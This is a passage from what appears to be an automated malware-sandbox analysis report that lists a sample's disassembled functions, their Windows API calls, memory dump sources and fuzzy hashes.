                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                    • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                                                                    • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                    • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040759D Relevance: .3, Instructions: 300COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                    • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                                                                    • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                    • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1860320154-0
                                                                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                    • String ID: N
                                                                                                                                    • API String ID: 3103080414-1130791706
                                                                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                    • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                                                                    • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                    • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                    • wsprintfA.USER32 ref: 0040621C
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                    • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                    • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                                                                    • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                    • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                    • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                    • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                    • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                      • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                    • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                    • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                    • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                    • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                    • lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                    • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
